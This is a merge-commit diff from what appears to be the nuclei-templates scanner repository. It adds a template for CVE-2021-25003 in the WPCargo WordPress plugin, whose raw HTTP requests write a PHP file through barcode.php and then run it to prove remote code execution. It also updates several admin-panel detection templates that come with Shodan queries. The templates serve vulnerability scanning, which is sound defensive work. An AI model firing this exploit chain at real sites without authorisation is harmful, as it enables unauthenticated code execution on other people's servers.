Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
2fd2a176a9
|
@ -1,3 +1,4 @@
|
|||
cves/2021/CVE-2021-25003.yaml
|
||||
cves/2021/CVE-2021-40661.yaml
|
||||
cves/2022/CVE-2022-22242.yaml
|
||||
cves/2022/CVE-2022-38870.yaml
|
||||
|
@ -14,6 +15,7 @@ exposed-panels/labkey-server-login.yaml
|
|||
exposed-panels/nginx-admin-panel.yaml
|
||||
exposed-panels/nginx-ui-dashboard.yaml
|
||||
exposed-panels/nport-web-console.yaml
|
||||
exposed-panels/ourmgmt3-panel.yaml
|
||||
exposed-panels/xiaomi-wireless-router-login.yaml
|
||||
exposed-panels/xnat-login.yaml
|
||||
misconfiguration/ampache-update-exposure.yaml
|
||||
|
|
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2021-25003
|
||||
|
||||
info:
|
||||
name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
|
||||
- https://wordpress.org/plugins/wpcargo/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25003
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-25003
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
2={{md5(num)}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_1 != 200"
|
||||
- "status_code_2 == 200"
|
||||
- "status_code_3 == 200"
|
||||
- "contains(body_3, md5(num))"
|
||||
- "contains(body_3, 'PNG')"
|
||||
condition: and
|
|
@ -1,32 +1,37 @@
|
|||
id: fortios-panel
|
||||
|
||||
info:
|
||||
name: FortiOs Exposed Panel
|
||||
author: canberbamber
|
||||
name: Fortios Exposed Panel
|
||||
author: canberbamber,Jna1
|
||||
severity: info
|
||||
description: |
|
||||
admin portal of fortios devices
|
||||
reference:
|
||||
- https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:945408572
|
||||
tags: panel,fortinet,fortios
|
||||
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/login?lang=en"
|
||||
- raw:
|
||||
- |
|
||||
GET /api/v2/cmdb/system/admin/admin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Please Login</title>"
|
||||
- "Launch FortiClient"
|
||||
condition: and
|
||||
- '/remote/login'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
- 'Server: xxxxxxxx-xxxxx'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 403
|
||||
|
|
|
@ -4,6 +4,9 @@ info:
|
|||
name: Keycloak Admin Panel
|
||||
author: incogbyte,righettod
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:-1105083093
|
||||
tags: panel,keycloak
|
||||
|
||||
requests:
|
||||
|
@ -12,13 +15,18 @@ requests:
|
|||
- "{{BaseURL}}/auth/admin/master/console/"
|
||||
- "{{BaseURL}}/auth/admin"
|
||||
|
||||
stop-at-first-match: true
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<a href=\"http://www.keycloak.org\">"
|
||||
- "keycloak"
|
||||
part: body
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
id: ourmgmt3-panel
|
||||
|
||||
info:
|
||||
name: OurMGMT3 Admin Panel
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"OurMGMT3"
|
||||
tags: panel,ourmgmt3
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/admin/login'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'OurMGMT3 Debug client'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,10 +1,11 @@
|
|||
id: geo-webserver
|
||||
id: geo-webserver-detect
|
||||
|
||||
info:
|
||||
name: GeoWebServer Detector
|
||||
author: dhiyaneshDK
|
||||
author: dhiyaneshDK,daffainfo
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"GeoWebServer"
|
||||
tags: panel,geowebserver
|
||||
|
||||
|
@ -22,3 +23,10 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "<TITLE>GeoWebServer</TITLE>"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: header
|
||||
group: 1
|
||||
regex:
|
||||
- 'Server: GeoWebServer ([0-9.]+)'
|
|
@ -6,6 +6,6 @@ info:
|
|||
description: A simple workflow that runs all GeoWebServer related nuclei templates on a given target.
|
||||
|
||||
workflows:
|
||||
- template: technologies/geo-webserver.yaml
|
||||
- template: technologies/geo-webserver-detect.yaml
|
||||
subtemplates:
|
||||
- tags: geowebserver
|
||||
- tags: geowebserver
|
||||
|
|
Loading…
Reference in New Issue